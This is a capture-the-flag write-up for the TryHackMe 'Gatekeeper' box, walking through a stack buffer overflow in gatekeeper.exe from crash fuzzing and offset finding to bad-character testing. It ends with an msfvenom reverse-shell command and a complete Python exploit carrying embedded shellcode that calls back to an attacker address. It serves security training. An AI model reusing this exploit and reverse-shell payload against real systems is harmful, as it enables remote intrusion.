TryHackMe-Gatekeeper


Contents
  • Overview
  • Challenge
    • Obtaining the target file
    • Triggering the crash
    • Finding the offset
    • Verifying the offset
    • Testing for bad characters
    • Getting the return address
    • Shellcode
    • Exploit code

Overview

Continuing the TryHackMe series, this time the box is Gatekeeper (https://tryhackme.com/room/gatekeeper). Its main theme is a stack buffer overflow, one of the most common classes of bugs introduced during software development and one of the topics covered by Offensive Security's OSCP certification.

Challenge

Obtaining the target file

Once the box is up it has the IP address 10.10.234.114. An Nmap scan reveals an SMB share, from which the target binary gatekeeper.exe is downloaded.


On a Windows test VM, double-click gatekeeper.exe to start it. `tasklist /svc | findstr /I gatekeeper` shows the process ID is 2912, and `netstat -ano | findstr 2912` shows that the program is listening on port 31337.

Connection test

Triggering the crash

Load the program in Immunity Debugger and set mona's working folder:

!mona config -set workingfolder c:\mona\%p


The test script is:

import socket

ip = '192.168.81.217'   # Windows test VM running gatekeeper.exe
timeout = 5

# send 100, 200, ... 1000 bytes of 'A', each terminated by a newline,
# and watch at which length the service stops responding
for i in range(1, 11):
    junk = b"A" * 100 * i
    buffer = junk + b'\n'
    print(len(junk))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((ip, 31337))
    s.send(buffer)
    data = s.recv(1024)
    s.close()

The program crashes at 200 bytes.

In Immunity, EIP reads 41414141, i.e. 'A'.

Finding the offset

Use Metasploit to generate a 200-byte unique pattern:

msf-pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Send the pattern in place of the 'A's:

import socket

ip = '192.168.81.217'
timeout = 5

# 200-byte cyclic pattern from msf-pattern_create; every 4-byte window is unique,
# so the value that lands in EIP identifies its position in the buffer
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"
buffer = junk + b'\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, 31337))
s.send(buffer)
data = s.recv(1024)
print(data)
s.close()

Then in Immunity:

!mona findmsp -distance 200

mona reports that the offset to EIP is 146.
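What msf-pattern_create and !mona findmsp do under the hood, as an added Python example that is not code from the original write-up: pattern_create builds the same cyclic pattern, and pattern_offset takes the EIP value as the debugger prints it and recovers the position in the buffer. The EIP value 0x39654138 used below is derived from the pattern itself (the bytes "8Ae9" sit at offset 146) rather than read from a screenshot of the crash, and the helper names are my own.

```python
import struct
from typing import Optional

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern used by msf-pattern_create.

    Units are Upper+lower+digit with the digit changing fastest
    (Aa0 Aa1 ... Aa9 Ab0 ...), so every 4-byte window is unique
    within the first 26*26*10*3 = 20280 bytes.
    """
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip: int, length: int = 20280) -> Optional[int]:
    """Locate the 4 bytes that landed in EIP inside the pattern.

    eip is the register value as the debugger shows it.  x86 is
    little-endian, so the lowest byte of the value is the first byte
    of the overwritten saved return address.  Returns the offset, or
    None when the value does not come from the pattern (for example
    0x41414141 from an all-'A' buffer, or a partial overwrite).
    """
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def eip_for_offset(offset: int, length: int = 20280) -> int:
    """Inverse helper: the EIP value the debugger would show if the
    saved return address sits `offset` bytes into the pattern."""
    window = pattern_create(length)[offset:offset + 4]
    return struct.unpack("<I", window)[0]


if __name__ == "__main__":
    print(pattern_create(200).decode())
    eip = eip_for_offset(146, 200)          # what EIP holds at offset 146
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(eip, 200)}")
```

pattern_offset searches the whole 20280-byte pattern by default, so it also works when the pattern sent was longer than the 200 bytes used here; pass the length you actually sent if you want a mismatch on a longer pattern to be reported as None rather than as an offset beyond the buffer.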

Verifying the offset

import socket

ip = '192.168.81.217'
timeout = 5

# 146 bytes of filler, then 4 bytes that should land exactly on EIP
junk = b'A' * 146
buffer = junk + b'B' * 4 + b'\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, 31337))
s.send(buffer)
data = s.recv(1024)
print(data)
s.close()

EIP now reads 42424242, i.e. 'B', confirming the offset.

Testing for bad characters

Reload the program and run the following in Immunity:

!mona bytearray -b "\x00"

Then send every byte value except \x00 right after the EIP overwrite, so the array can later be compared against what actually reached memory:

import socket

ip = '192.168.81.217'

offset = 146

# all byte values \x01..\xff; \x00 is left out because it is
# already known to terminate C strings
badchar = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

payload = b'A' * offset + b'B' * 4 + badchar

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 31337))
s.send(payload + b'\n')
data = s.recv(1024)
print(data)
s.close()

Then run in Immunity:

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 006019F8

The bad characters are \x00 and \x0a.
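The comparison that !mona compare performs, as an added Python example that is not part of the original write-up: the byte array that was sent is walked in lockstep against the bytes recovered from the crashed process, the first byte that did not survive is reported, and the round is repeated with that byte excluded until the array arrives intact. Because there is no process to attach to here, the target is a constructed stand-in (simulated_copy, assumed to stop at a newline because the protocol is line-based and at a NUL because the buffer is a C string); it is not gatekeeper.exe. has_bad_chars is the same check applied to any bytes that will go into the final buffer, such as a candidate return address.

```python
from typing import Callable, Iterable, List


def find_bad_chars(sent: bytes, observed: bytes) -> List[int]:
    """Compare what was sent with what the debugger found in memory.

    Returns the value of the first byte that was altered or that ended
    the copy (observed is shorter than sent).  Only the first mismatch
    is reported: once a byte is dropped everything after it shifts and
    later comparisons are meaningless, which is why bad-character
    hunting is done in rounds.
    """
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return [b]
    return []


def bad_char_rounds(capture: Callable[[bytes], bytes],
                    excluded: Iterable[int] = (0x00,)) -> List[int]:
    """Repeat send/compare until the byte array survives intact.

    capture(array) must return the bytes that reached the target buffer
    (in the real workflow: what the debugger shows at the array's address).
    excluded seeds the set; 0x00 by default, as the page did with
    '!mona bytearray -b' and NUL.
    """
    bad = set(excluded)
    while True:
        array = bytes(b for b in range(256) if b not in bad)
        found = find_bad_chars(array, capture(array))
        if not found:
            return sorted(bad)
        bad.update(found)


def has_bad_chars(data: bytes, bad: Iterable[int]) -> List[int]:
    """Which of the bad byte values occur in data (empty list = safe)."""
    return sorted(set(data) & set(bad))


def simulated_copy(data: bytes) -> bytes:
    """Constructed stand-in for the vulnerable copy, NOT gatekeeper.exe:
    the service reads one line, so input stops at the first 0x0a, and
    the buffer is a C string, so a 0x00 ends it as well."""
    end = len(data)
    for term in (0x0a, 0x00):
        i = data.find(bytes([term]))
        if i != -1:
            end = min(end, i)
    return data[:end]


if __name__ == "__main__":
    bad = bad_char_rounds(simulated_copy)
    print("bad chars:", ["0x%02x" % b for b in bad])
    # a candidate return address must avoid them too: 080414C3 little-endian
    ret = b"\xc3\x14\x04\x08"
    print("ret bytes", ret.hex(), "clashes:", has_bad_chars(ret, bad))
```

Against the stand-in the first round reports 0x0a (the array is cut at the newline), the second round passes, and the result is [0x00, 0x0a], matching what mona reported on the real binary. Run has_bad_chars over the return address and the generated shellcode before assembling the final buffer; a clash there is the usual reason a payload that "should work" silently dies.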

Getting the return address

The return address obtained is

080414C3
or
080416BF

Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.81.198 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

Exploit code

import socket

ip = '192.168.81.217'

offset = 146
# 080414C3 packed little-endian
ret_address = b'\xC3\x14\x04\x08'

# msfvenom output (windows/shell_reverse_tcp), generated with \x00 and \x0a excluded
shellcode = (b"\xdd\xc0\xd9\x74\x24\xf4\xba\xe2\x4f\x27\x01\x5e\x29\xc9\xb1"
b"\x52\x83\xee\xfc\x31\x56\x13\x03\xb4\x5c\xc5\xf4\xc4\x8b\x8b"
b"\xf7\x34\x4c\xec\x7e\xd1\x7d\x2c\xe4\x92\x2e\x9c\x6e\xf6\xc2"
b"\x57\x22\xe2\x51\x15\xeb\x05\xd1\x90\xcd\x28\xe2\x89\x2e\x2b"
b"\x60\xd0\x62\x8b\x59\x1b\x77\xca\x9e\x46\x7a\x9e\x77\x0c\x29"
b"\x0e\xf3\x58\xf2\xa5\x4f\x4c\x72\x5a\x07\x6f\x53\xcd\x13\x36"
b"\x73\xec\xf0\x42\x3a\xf6\x15\x6e\xf4\x8d\xee\x04\x07\x47\x3f"
b"\xe4\xa4\xa6\x8f\x17\xb4\xef\x28\xc8\xc3\x19\x4b\x75\xd4\xde"
b"\x31\xa1\x51\xc4\x92\x22\xc1\x20\x22\xe6\x94\xa3\x28\x43\xd2"
b"\xeb\x2c\x52\x37\x80\x49\xdf\xb6\x46\xd8\x9b\x9c\x42\x80\x78"
b"\xbc\xd3\x6c\x2e\xc1\x03\xcf\x8f\x67\x48\xe2\xc4\x15\x13\x6b"
b"\x28\x14\xab\x6b\x26\x2f\xd8\x59\xe9\x9b\x76\xd2\x62\x02\x81"
b"\x15\x59\xf2\x1d\xe8\x62\x03\x34\x2f\x36\x53\x2e\x86\x37\x38"
b"\xae\x27\xe2\xef\xfe\x87\x5d\x50\xae\x67\x0e\x38\xa4\x67\x71"
b"\x58\xc7\xad\x1a\xf3\x32\x26\xe5\xac\x6d\x70\x8d\xae\x8d\x6d"
b"\x12\x26\x6b\xe7\xba\x6e\x24\x90\x23\x2b\xbe\x01\xab\xe1\xbb"
b"\x02\x27\x06\x3c\xcc\xc0\x63\x2e\xb9\x20\x3e\x0c\x6c\x3e\x94"
b"\x38\xf2\xad\x73\xb8\x7d\xce\x2b\xef\x2a\x20\x22\x65\xc7\x1b"
b"\x9c\x9b\x1a\xfd\xe7\x1f\xc1\x3e\xe9\x9e\x84\x7b\xcd\xb0\x50"
b"\x83\x49\xe4\x0c\xd2\x07\x52\xeb\x8c\xe9\x0c\xa5\x63\xa0\xd8"
b"\x30\x48\x73\x9e\x3c\x85\x05\x7e\x8c\x70\x50\x81\x21\x15\x54"
b"\xfa\x5f\x85\x9b\xd1\xdb\xa5\x79\xf3\x11\x4e\x24\x96\x9b\x13"
b"\xd7\x4d\xdf\x2d\x54\x67\xa0\xc9\x44\x02\xa5\x96\xc2\xff\xd7"
b"\x87\xa6\xff\x44\xa7\xe2")


# filler up to EIP, the return address, a 16-byte NOP sled, then the shellcode
payload = b'A' * offset + ret_address + b'\x90' * 16 + shellcode + b'\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 31337))
s.send(payload)
data = s.recv(1024)
print(data)
s.close()

Change the IP address to the TryHackMe box's address and the overflow returns a shell, giving the initial foothold.

Feel free to share; when reposting please credit the source: 内存溢出 (outofmemory.cn)

Original URL: http://outofmemory.cn/zaji/5693777.html
